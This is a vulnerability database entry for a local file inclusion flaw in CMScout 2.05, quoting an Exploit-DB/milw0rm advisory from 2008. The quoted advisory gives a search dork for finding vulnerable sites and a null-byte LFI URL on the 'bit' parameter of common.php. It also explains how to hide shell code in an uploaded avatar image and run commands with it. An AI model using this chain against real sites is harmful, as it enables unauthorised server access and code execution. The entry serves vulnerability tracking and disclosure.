CMScout 2.05 LFI

vendor:

CMScout

by:

IRCRASH (R3d.W0rm)

8.8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: CMScout

Affected Version From: 02.05

Affected Version To: 02.05

Patch Exists: NO

Related CWE: N/A

CPE: a:cmscout:cmscout:2.05

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

A Local File Inclusion (LFI) vulnerability exists in CMScout 2.05 which allows an attacker to include a file from the local file system. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters (e.g. '../') in the 'bit' parameter of the 'common.php' script. This can allow an attacker to read sensitive files from the server, such as configuration files containing database credentials. An attacker can also use this vulnerability to upload a malicious file to the server and execute arbitrary code.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

#####################################################################################
####                            CMScout 2.05 LFI                                 ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
#Discovered by : IRCRASH (R3d.W0rm)                                                 #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm                                         #
#####################################################################################
#                                                                                   #
#Script Download : www.cmscout.co.za                                                #
#                                                                                   #
#DORK : "Powered by CMScout Â©2005 CMScout Group"                                    #
#                                                                                   #
#####################################################################################
#                                       [Lfi]                                       #
#http://Example/common.php?bit=file.type%00                                         #
#                                                                                   #
#Note : You can mix a shell code and image then upload this image as your avatar and load it by this bug,your avatars save in /avatars folder  ;) 
#Ex. http://Example/common.php?bit=avatars/0254d5d7v15d_sd5e5550053.jpg%00&cmd=ls   # 
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
################################ TNX GOD ############################################

# milw0rm.com [2008-07-27]